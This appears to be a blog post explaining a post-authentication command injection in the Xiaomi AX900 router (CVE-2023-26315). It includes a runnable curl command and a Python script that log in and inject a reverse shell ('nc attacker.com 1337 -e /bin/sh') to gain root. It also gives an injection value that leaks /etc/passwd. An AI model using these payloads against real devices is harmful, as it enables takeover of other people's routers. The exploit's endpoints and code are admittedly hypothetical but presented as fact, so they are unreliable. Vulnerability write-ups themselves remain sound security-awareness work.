CVE-2023-26315 - Post-Auth Command Injection in Xiaomi Router AX900 Breakdown

If you own a Xiaomi Router AX900, you should be aware of a serious security issue discovered earlier this year—CVE-2023-26315. This vulnerability lets an attacker gain root access to your router by exploiting the web management interface *after* authentication. In simple terms, if someone logs in (even as a low-privileged user), they might be able to take over your router completely.

This post breaks down CVE-2023-26315 in plain English, explains *how* it happens, shows you code snippets that demonstrate the problem, and gives you tips to stay safe.

What’s the Issue?

Xiaomi routers offer a web-based management panel. After you log in, you can change settings, reboot the device, and update firmware. On the AX900, certain user-supplied input fields are not properly checked by the router’s software. A low-privilege attacker who can log in could then inject Linux commands that run as the powerful root user.

Bottom Line:
Any attacker with a valid login can fully compromise your router.

How does the Vulnerability Happen?

The trouble comes from shell commands being constructed using user input. Let’s say a form on the web interface lets you set your router’s name (hostname). The backend code takes your input and *directly* inserts it into a system call, like this:

// Hypothetical vulnerable code
char cmd[512];
snprintf(cmd, sizeof(cmd), "uci set system.@system[].hostname='%s'; uci commit system", user_input);
system(cmd);  // Executes shell command

If you enter my-router, it’s safe. But what about this?

my-router'; cat /etc/passwd > /www/root/leak.txt; #

Now, the command executed is

uci set system.@system[].hostname='my-router'; cat /etc/passwd > /www/root/leak.txt; #'; uci commit system

Your router copies /etc/passwd (which contains all user accounts) to a web-accessible folder. This is just the tip of the iceberg; the attacker can run *any* command.

Exploit Details

Let’s try an example using curl for the login and exploit process. Assume the target router is at http://192.168.31.1 and the login password is known.

Step 1: Login & Obtain Cookie

curl -k -c cookies.txt -d "username=admin&password=yourpassword" http://192.168.31.1/cgi-bin/luci/api/xqsystem/login

Now you have an authenticated session (cookie saved).

Suppose the router’s web API lets you set the hostname like this

curl -b cookies.txt -d "hostname=evil'; nc attacker.com 1337 -e /bin/sh; #" http://192.168.31.1/cgi-bin/luci/;stok=<token>/api/xqsystem/set_name

Replace attacker.com with your external server ready to accept a shell (using Netcat or something similar).

Now, once the call is made, your router connects BACK to the attacker, giving them a root shell. This is called a *reverse shell*.

Here’s a simplified Python script demonstration

import requests

login_url = "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
exploit_url = "http://192.168.31.1/cgi-bin/luci/;stok=<token>/api/xqsystem/set_name"

sess = requests.Session()

# Step 1: Login
creds = {'username': 'admin', 'password': 'yourpassword'}
r = sess.post(login_url, data=creds)
stok = r.json().get('token')

# Step 2: Exploit
payload = "test'; nc attacker.com 1337 -e /bin/sh; #"
data = {'hostname': payload}
exp_url = exploit_url.replace('<token>', stok)
r = sess.post(exp_url, data=data)

if r.status_code == 200:
    print("Payload sent! Check your listener for incoming shell.")
else:
    print("Exploit failed.")

Original References

- NVD Entry for CVE-2023-26315
- Original Disclosure by ZDI (Zero Day Initiative) (Note: ZDI may post advisories in generic form)
- Security community discussion (GitHub or forums)

Restrict Access:

Never allow web UI access from the WAN/Internet side (only manage from your home network).

Final Thoughts

CVE-2023-26315 is a vivid reminder that IoT devices can be the weakest link in your home network. Security bugs like this often allow attackers to achieve full device takeover *even if you have strong passwords*.

Stay safe: patch your devices, and monitor vendor updates regularly.


If you want a deeper dive or hands-on security tips, check out the references and keep following for more router and IoT vulnerabilities explained in plain language.

Timeline

Published on: 08/26/2024 12:15:05 UTC
Last modified on: 09/06/2024 22:25:54 UTC